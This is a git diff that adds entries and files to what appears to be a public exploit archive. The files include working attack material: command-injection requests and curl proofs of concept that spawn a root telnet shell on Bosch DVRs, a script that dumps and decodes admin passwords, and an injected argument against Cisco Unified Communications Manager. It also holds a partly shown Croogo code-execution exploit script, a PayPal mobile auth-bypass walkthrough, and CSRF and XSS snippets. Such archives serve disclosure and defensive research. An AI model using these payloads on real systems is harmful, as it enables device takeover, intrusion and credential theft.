diff --git a/files.csv b/files.csv
index f8cd63724..20852bd59 100755
--- a/files.csv
+++ b/files.csv
@@ -31197,6 +31197,7 @@ id,file,description,date,author,platform,type,port
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
+34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
@@ -31474,3 +31475,19 @@ id,file,description,date,author,platform,type,port
34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability",2009-05-11,root@80sec.com,php,remote,0
34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection Vulnerability",2010-11-02,VSN,php,webapps,0
34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal Vulnerability",2010-11-02,"Luke Taylor",multiple,remote,0
+34953,platforms/linux/local/34953.txt,"FUSE fusermount Tool - Race Condition Vulnerability",2010-11-02,halfdog,linux,local,0
+34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager <= 8.0 Invalid Argument Privilege Escalation Vulnerability",2010-11-03,"Knud Erik Hjgaard",hardware,local,0
+34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x SQL Error Information Disclosure Vulnerability",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0
+34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0
+34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0
+34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0
+34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0
+34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0
+34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
+34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0
+34969,platforms/hardware/webapps/34969.html,"Tenda A32 Router - CSRF Vulnerability",2014-10-14,zixian,hardware,webapps,0
+34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0
+34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 'pdaview.asp' Cross Site Scripting Vulnerability",2010-11-05,"Wesley Kerfoot",asp,webapps,0
+34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 'id' Parameter SQL Injection Vulnerability",2010-11-05,jos_ali_joe,php,webapps,0
+34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress 'handler_image.php' Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0
+34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0
diff --git a/platforms/asp/webapps/34971.txt b/platforms/asp/webapps/34971.txt
new file mode 100755
index 000000000..c4bffd067
--- /dev/null
+++ b/platforms/asp/webapps/34971.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44689/info
+
+Angel Learning Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Angel Learning Management System 7.3 is vulnerable; other versions may also be affected.
+
+https://[Angel
+Root]/portal/pdaview.asp?p_TS=85546&p_id=InTouchMail&pdaback="?p_TS=
+85546
\ No newline at end of file
diff --git a/platforms/hardware/local/34954.txt b/platforms/hardware/local/34954.txt
new file mode 100755
index 000000000..3522ab693
--- /dev/null
+++ b/platforms/hardware/local/34954.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44672/info
+
+Cisco Unified Communications Manager is prone to a local privilege-escalation vulnerability.
+
+Attackers can exploit this issue to gain administrative access to the affected device and execute arbitrary code with superuser privileges. Successful exploits will lead to the complete compromise of the device.
+
+This issue is tracked by Cisco Bug ID CSCti52041 and CSCti74930.
+
+Cisco Unified Communications Manager 6, 7, and 8 are vulnerable.
+
+/usr/local/cm/bin/pktCap_protectData -i";id"
\ No newline at end of file
diff --git a/platforms/hardware/webapps/34956.txt b/platforms/hardware/webapps/34956.txt
new file mode 100755
index 000000000..f19057f99
--- /dev/null
+++ b/platforms/hardware/webapps/34956.txt
@@ -0,0 +1,260 @@
+ :::::::-. ... ::::::. :::.
+ ;;, `';, ;; ;;;`;;;;, `;;;
+ `[[ [[[[' [[[ [[[[[. '[[
+ $$, $$$$ $$$ $$$ "Y$c$$
+ 888_,o8P'88 .d888 888 Y88
+ MMMMP"` "YmmMMMM"" MMM YM
+
+ [ Discovered by dun \ posdub[at]gmail.com ]
+ [ 2014-10-01 ]
+###############################################################################
+# [ Bosch Security Systems DVR 630/650/670 Series ] Multiple Vulnerabilities #
+###############################################################################
+#
+# Device: "The Bosch Video Recorder 630/650 Series is an 8/16
+# channel digital recorder that uses the latest H.264
+# compression technology. With the supplied PC
+# software and built-in web server, the 630/650 Series is
+# a fully integrated, stand-alone video management
+# solution that's ready to go, straight out of the box.
+# Available with a variety of storage capacities, the
+# 630/650 Series features a highly reliable embedded
+# design that minimizes maintenance and reduces
+# operational costs. The recorder is also available with a
+# built-in DVD writer."
+#
+# Vendor: http://www.boschsecurity.com/
+# Product: DVR 630/650 http://resource.boschsecurity.us/documents/Data_sheet_enUS_1977239307.pdf
+# DVR 670 http://resource.boschsecurity.us/documents/DVR_670_Series_Data_sheet_enUS_7654294923.pdf
+#
+# Software Download:
+# http://resource.boschsecurity.us/software/Software_DVR630_650_firmware_v212_all_1980902667.zip
+# http://resource.boschsecurity.us/software/Software_DVR670_firmware_v212_enUS_8599929867.zip
+#
+# Timeline: 2014-10-01 Vulnerability discovered
+# 2014-10-03 1 Contact with vendor - No response
+# 2014-10-14 Published
+#
+#
+###################################################################
+# Gaining Root Shell Access [1]:
+
+POST /Net_work.xml HTTP/1.1
+Accept: */*
+Accept-Language: pl
+Referer: http://10.11.219.2/network.html
+Content-Type: text/xml; charset=UTF-8
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
+Host: 10.11.219.2
+Content-Length: 1274
+DNT: 1
+Proxy-Connection: Keep-Alive
+Pragma: no-cache
+Cookie: MosaLanguage=0; session=
+
+
+ 0
+ 10.11.219.2
+ 255.255.255.0
+ 10.11.219.1
+ 0.0.0.0
+ 0.0.0.0
+ 10.11.219.2
+ 255.255.255.0
+ 10.11.219.1
+ 0.0.0.0
+ 0.0.0.0
+ 80
+ 0
+ 1
+ wxss
+ ffl
+ |telnetd -l${SHELL} -p30 #
+
+
+
+ sdads
+ dsadsd
+ sdasdas
+ dasdas
+ 0
+ 0
+ 0
+ 0
+ 0
+ 0
+ 0
+ 0
+ 0
+ 0
+
+ 25
+ 0
+
+
+
+
+
+
+
+ 0
+
+
+## PoC:
+
+root@debian:~# curl -i -s -k -X 'POST' -H 'Referer: http://10.11.219.2/network.html' -H 'Content-Type: text/xml; charset=UTF-8' \
+ -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
+ -b 'MosaLanguage=0; session=' --data-binary $'\x0d\x0a 0\x0d\x0a 10.11.219.2\x0d\x0a \
+ 255.255.255.0\x0d\x0a 10.11.219.1\x0d\x0a 0.0.0.0\x0d\x0a \
+ 0.0.0.0\x0d\x0a 10.11.219.2\x0d\x0a 255.255.255.0\x0d\x0a 10.11.219.1\x0d\x0a \
+ 0.0.0.0\x0d\x0a 0.0.0.0\x0d\x0a 80\x0d\x0a 0\x0d\x0a \
+ 1\x0d\x0a wxss\x0d\x0a ffl\x0d\x0a \
+ |telnetd -l${SHELL} -p30 #\x0d\x0a \x0d\x0a \x0d\x0a \
+ \x0d\x0a sdads\x0d\x0a dsadsd\x0d\x0a \
+ sdasdas\x0d\x0a dasdas\x0d\x0a 0\x0d\x0a \
+ 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a \
+ 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a \
+ 0\x0d\x0a \x0d\x0a 25\x0d\x0a 0\x0d\x0a \x0d\x0a \
+ \x0d\x0a \x0d\x0a \x0d\x0a \x0d\x0a \x0d\x0a \
+ \x0d\x0a 0\x0d\x0a\x0d\x0a' 'http://10.11.219.2/Net_work.xml'
+
+root@debian:~# telnet 10.11.219.2 30
+Trying 10.11.219.2...
+Connected to 10.11.219.2.
+Escape character is '^]'.
+
+BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+
+/ # id
+uid=0(root) gid=0(root)
+/ # uname -a
+Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
+/ # ps |grep telnet
+ 2827 root 228 S telnetd -l/bin/sh -p30
+/ # netstat -ltn | grep 30
+tcp 0 0 0.0.0.0:30 0.0.0.0:* LISTEN
+/ # echo pwnd & exit
+pwnd
+Connection closed by foreign host.
+root@debian:~#
+
+###################################################################
+# Gaining Root Shell Access (authorization is needed) [2]:
+
+GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 HTTP/1.1
+Accept: */*
+Accept-Language: pl
+Referer: http://10.11.219.2/system.html
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
+Host: 10.11.219.2
+DNT: 1
+Proxy-Connection: Keep-Alive
+Cookie: MosaLanguage=0; session=
+
+## PoC:
+
+root@debian:~# curl -i -s -k -X 'GET' \
+ -H 'Referer: http://10.11.219.2/system.html' \
+ -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
+ -b 'MosaLanguage=0; session=' 'http://10.11.219.2/ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id'
+
+
+root@debian:~# telnet 10.11.219.2 40
+Trying 10.11.219.2...
+Connected to 10.11.219.2.
+Escape character is '^]'.
+
+BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+
+/ # id
+uid=0(root) gid=0(root)
+/ # uname -a
+Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
+/ # ps |grep telnet
+ 2827 root 228 S telnetd -l/bin/sh -p40
+/ # netstat -ltn | grep 40
+tcp 0 0 0.0.0.0:40 0.0.0.0:* LISTEN
+/ # echo pwnd & exit
+pwnd
+Connection closed by foreign host.
+root@debian:~#
+
+###################################################################
+# Admin Password Disclosure: http://10.11.219.2/User.cgi?cmd=get_user
+
+## PoC Exploit:
+
+#!/bin/bash
+x=0;
+for i in $(curl --silent http://10.11.219.2/User.cgi?cmd=get_user| sed 's/<[^>]\+>/ /g' | sed -r 's/(\s)+[0-9]//g');
+do base64 -d<<<$i; if [ $(( $x % 2 )) -eq 0 ]; then echo -n ":"; else echo ; fi; ((x++)); done
+
+###################################################################
+# Sensitive Information Disclosure:
+
+http://10.11.219.2/Config.cgi?cmd=system_info
+http://10.11.219.2/System.xml
+http://10.11.219.2/Net_work.xml
+
+http://10.11.219.2/webcmd.html
+
+/ # cat /4mosa600/data/Webcmd_help.txt
+
+ cmd value (sample)
+====================+==========================
+ blockid | 0 ~ block max // show block info and flag and gop status.
+--------------------+-------------------------
+ disk | // show disk temp.
+--------------------+-------------------------
+ reboot | // restart DVR.
+--------------------+-------------------------
+ remote-info | // socket status.
+--------------------+-------------------------
+ log | 1: System // show system log.
+ | 2: Record
+ | 4: Login
+ | 8: Configure
+ | 16: Operation
+ | 31: All
+ | 63: Service
+--------------------+-------------------------
+ ionly | 1~12 how many frames in a GOP will send to internet
+ | 0: all I/P-frame (default)
+ | 1: I only
+ | 2: IP
+ | 3: IPP
+ | 4: IPPP
+ | ....
+ | 12: IPPPPPPPPPPP
+ | others: show current value on DVR.
+--------------------+-------------------------
+ chlink | 0~MKF_CHANNEL // show channel link.
+--------------------+-------------------------
+ bitrate | // show bitrate information.
+--------------------+-------------------------
+ dls | // show about time and DLS message.
+--------------------+-------------------------
+ bmp | // dump bmp file to http://x.x.x.x/vga0.bmp
+--------------------+-------------------------
+ msg | This is bitmap
+ | bit 0 show encode FPS and Bitrate.
+ | bit 1 show encode resolution.(dependent bit 1)
+ | bit 2 show remote client mesage.
+ | bit 3 show ptz command.
+ | bit 4 cpu and memory usage..
+--------------------+-------------------------
+ remote-cgi | 0 disable all cgi command.
+ | 1 show all cgi command to console.
+ | 2 show cig command if not "login_id"
+--------------------+-------------------------
+
+
+
+
+
+
+
diff --git a/platforms/hardware/webapps/34969.html b/platforms/hardware/webapps/34969.html
new file mode 100755
index 000000000..3b23ceb5e
--- /dev/null
+++ b/platforms/hardware/webapps/34969.html
@@ -0,0 +1,14 @@
+# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
+# CVE ID :CVE-2014-7281
+# Date: 2014-10-10
+# Exploit Author: zixian
+# Vendor Homepage: http://tenda.com.cn/
+# Software Link: http://tenda.com.cn/Catalog/Product/325
+# Version: V5.07.53_CN
+
+
+
+When the administrator login, click on the link below? the device will reboot?
+
+
+reboot
\ No newline at end of file
diff --git a/platforms/ios/webapps/34957.txt b/platforms/ios/webapps/34957.txt
new file mode 100755
index 000000000..980de4160
--- /dev/null
+++ b/platforms/ios/webapps/34957.txt
@@ -0,0 +1,239 @@
+Document Title:
+===============
+PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=895
+
+PayPal Security UID: Vxda0S
+
+Video: http://www.vulnerability-lab.com/get_content.php?id=1338
+
+View: https://www.youtube.com/watch?v=RXubXP_r2M4
+
+
+Release Date:
+=============
+2014-10-09
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+895
+
+
+Common Vulnerability Scoring System:
+====================================
+6.2
+
+
+Product & Service Introduction:
+===============================
+PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
+transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
+a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
+time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
+spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
+funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
+(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
+PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
+PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
+funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
+The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
+a transfer to their bank account.
+
+PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
+charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
+used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
+type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.
+
+On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
+States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
+Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
+Europe, PayPal also operates as a Luxembourg-based bank.
+
+On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
+to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
+Between December 4ń9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
+for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.
+
+(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a security auth protection mechanism bypass vulnerability in the PayPal Inc iOS Mobile Application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-10-09: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+PayPal Inc
+Product: iOS Mobile Application - Banking 4.6.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+An auth restriction bypass vulnerability has been discovered in the official PayPal Inc mobile webapplication and api.
+The vulnerability allows to bypass a filter or restrction of the online-service to get unauthorized paypal account access.
+
+The security vulnerability is located in the mobile api auth procedure of the paypal online-service. The mobile app api does not
+check for already restricted/blocked application accounts. Remote attackers are able to login through the mobile api with paypal
+portal restriction to access account information or interact with the compromised account.
+
+If a paypal user tries several times to login with a wrong password/user combination the paypal account will temporarily be closed
+for security reasons. When this happens the user needs to answer a secret question to get the account open again. Even if the account
+is temporarily closed it is possible to get access to the account via the paypal mobile app client through the API.
+
+The client API checks only if the account exists, the API does not check a part- or full blocking of the account. It is possible for
+the blocked user to get access to his paypal account and is able to make transactions and he can send money from the account. The mobile
+iPhone / iPad Paypal App does need a security upgrade to ensure that the status of an account is also verified and how the App reacts when
+such an event takes place. This would ensure that no one can have access via the mobile client to a blocked account. In the Paypal database
+there are several preferences for an account to verify the status of the account. These preferences need to be used to check also the account
+status on the mobile client API. There is another exception which drops a push message on iOS devices (iphone & ipad) which refers to the main
+paypal website but it is only a temporary solution and no possibility to block account stable.
+
+During the pentest the researcher revealed that he was able to access the blocked test account through the mobile application api. At the end the
+researcher was able to interact through the mobile app by easily accessing the information of the paypal account x01445@gmail.com.
+
+The security risk of the auth bypass restriction vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2.
+Exploitation of the vulnerability requires a restricted/blocked account of the paypal application without user interaction. Successful exploitation
+of the issue results in auth restriction bypass through the official mobile paypal app api.
+
+Vulnerable Service(s):
+ [+] PayPal Inc
+Vulnerable Software(s):
+ [+] PayPal iOS App (iPhone & iPad) v4.6.0
+Vulnerable Module(s):
+ [+] API
+Affected Module(s):
+ [+] Login Verification – (Auth)
+
+
+Proof of Concept (PoC):
+=======================
+The auth bypass restriction vulnerability can be exploited by remote attackers without user interaction but with low privileged application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+Site: PayPal Inc (www.paypal.com)
+Test Account: x01445@gmail.com 01x445@gmail.com
+Mobile Client: https://itunes.apple.com/us/app/paypal/id283646709
+
+#1 Manual steps to reproduce the issue with security question
+1. Register a regular PayPal account linked to a banking account
+2. Go to the login & provoke the ask for security questions after several wrong forced passwords login requests
+3. It is also possible to do it when logged into the account and provoke via transaction cancels & co.
+4. Now, try to login again and we see the "Security Question" module
+5. We switch to our iphone or ipad device and download & install the new paypal mobile application v4.6.0
+6. Open the mobile application on your ipad or iphone device and login to your account
+Note: The security protection mechanism of the main paypal core application disallows to login
+without the verification attempt of the security question module!
+7. The application allows the user to login via the mobile paypal app api without auth cancel or sec question popup
+8. We login successful!
+9. Now, the attacker can handle transactions, send money, request money, add funds, change address or include new cards
+10. Successful reproduced!
+#2 Manual steps to reproduce the issue without security question
+1. Install the application to your iOS device (ipad or iphone)
+2. Register a paypal inc user account
+3. Solve a transaction and provoke an incident that the account get blocked
+4. Now, login to the ios device and start the paypal application
+5. Include the blocked login credentials and press the login button
+6. The service grants access through the mobile api without processing to drop any exception to prevent the access
+
+Note: Now the attacker is able to request the stored data of the paypal user in the portal even if the
+service is restricted accessable. Regular the service must block you like when you login to the portal
+but in case of the issue the api grants the access because of missing value check.
+
+Security Video Demonstration Description
+The video shows two blocked accounts. The first is the 01x445@gmail.com pp test account and the second is the x01445@gmail.com pp test account.
+The first one is nulled and frozen and the second one has also been blocked. The video shows in the first steps both login profiles with are
+unsuccessful. After providing to demonstrate that the x01445@gmail.com account is not allowed to access the portal we show how to unauthorized
+access the account information even if the service has blocked to login through the main paypal. The researcher demonstrates how to bypass the
+restricted account to get access and interact via api.
+
+Reference(s): Links
+https://itunes.apple.com/us/app/paypal/id283646709
+https://www.paypal.com
+
+Resource(s):
+ ../Paypal Mobile API Auth Bypass Restriction.wmv
+
+Picture(s):
+ ../1.jpg – 11.jpg
+ ../1.png –
+
+
+Solution - Fix & Patch:
+=======================
+The security vulnerability can be patched by a secure recognition of the validation procedure when
+processing to request restriction values through api in the paypal account system.
+The same exception that popup for the account 01x445@gmail.com which is nulled needs to
+prevent the same problem of the account x01445@gmail.com.
+The account system itself should never allow to grant access for an account that has been restricted
+in the main service that manages the paypal users. The bug does not only hurt the security policy it
+is an infrastructure bug too.
+
+
+Security Risk:
+==============
+The security risk of the protection mechanism bypass vulnerability via mobile api is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/linux/local/34953.txt b/platforms/linux/local/34953.txt
new file mode 100755
index 000000000..acc2fe7d1
--- /dev/null
+++ b/platforms/linux/local/34953.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/44623/info
+
+FUSE fusermount tool is prone to a race-condition vulnerability.
+
+A local attacker can exploit this issue to cause a denial of service by unmounting any filesystem of the system.
+
+http://www.exploit-db.com/sploits/34953.zip
\ No newline at end of file
diff --git a/platforms/php/webapps/34955.txt b/platforms/php/webapps/34955.txt
new file mode 100755
index 000000000..2cbb91169
--- /dev/null
+++ b/platforms/php/webapps/34955.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44674/info
+
+Joomla! is prone to an information-disclosure vulnerability due to an SQL error.
+
+Exploiting this issue can allow attackers to gain access to sensitive information contained in the application's database. Successful exploits may lead to other attacks.
+
+Versions prior to Joomla! 1.5.22 are vulnerable.
+
+http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
+http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_front.jpg
+http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_back.jpg
\ No newline at end of file
diff --git a/platforms/php/webapps/34958.py b/platforms/php/webapps/34958.py
new file mode 100755
index 000000000..e9ec82e99
--- /dev/null
+++ b/platforms/php/webapps/34958.py
@@ -0,0 +1,369 @@
+#!/usr/bin/env python
+#
+#
+# Croogo 2.0.0 Arbitrary PHP Code Execution Exploit
+#
+#
+# Vendor: Fahad Ibnay Heylaal
+# Product web page: http://www.croogo.org
+# Affected version: 2.0.0
+#
+# Summary: Croogo is a free, open source, content management system
+# for PHP, released under The MIT License. It is powered by CakePHP
+# MVC framework.
+#
+# Desc: Croogo suffers from an authenticated arbitrary PHP code
+# execution. The vulnerability is caused due to the improper
+# verification of uploaded files in '/admin/file_manager/attachments/add'
+# script thru the 'data[Attachment][file]' POST parameter and in
+# '/admin/file_manager/file_manager/upload' script thru the
+# 'data[FileManager][file]' POST parameter. This can be exploited
+# to execute arbitrary PHP code by uploading a malicious PHP script
+# file that will be stored in '/webroot/uploads/' directory.
+#
+# Tested on: Apache/2.4.7 (Win32)
+# PHP/5.5.6
+# MySQL 5.6.14
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2014-5202
+# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5202.php
+#
+# Vendor: http://blog.croogo.org/blog/croogo-210-released
+#
+#
+# 26.07.2014
+#
+#
+
+version = '5.0.0.251'
+
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import logging, os, time, datetime, re
+
+from colorama import Fore, Back, Style, init
+from cStringIO import StringIO
+from urllib2 import URLError
+
+init()
+
+if os.name == 'posix': os.system('clear')
+if os.name == 'nt': os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def bannerche():
+ print '''
+ @---------------------------------------------------------------@
+ | |
+ | Croogo 2.0.0 Arbitrary PHP Code Execution Exploit |
+ | |
+ | |
+ | ID: ZSL-2014-5202 |
+ | |
+ | Copyleft (c) 2014, Zero Science Lab |
+ | |
+ @---------------------------------------------------------------@
+ '''
+ if len(sys.argv) < 3:
+ print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' \n'
+ print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk croogo\n'
+ sys.exit()
+
+bannerche()
+
+print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
+
+host = sys.argv[1]
+path = sys.argv[2]
+
+cj = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+try:
+ getcsrf = opener.open('http://'+host+'/'+path+'/admin/users/users/login')
+ csrf = getcsrf.read()
+except urllib2.HTTPError, errorzio:
+ if errorzio.code == 404:
+ print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+ print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
+ print
+ sys.exit()
+except URLError, errorziocvaj:
+ if errorziocvaj.reason:
+ print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+ print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
+ print
+ sys.exit()
+
+print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
+
+token_key = re.search(r'\[key\]\" value=\"(.+?)\"', csrf).group(1)
+print '\x20\x20[*] Retrieving login CSRF token '+'.'*27+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Login CSRF token: '+Fore.YELLOW+token_key+Fore.RESET
+
+print '\x20\x20[*] Login please.'
+
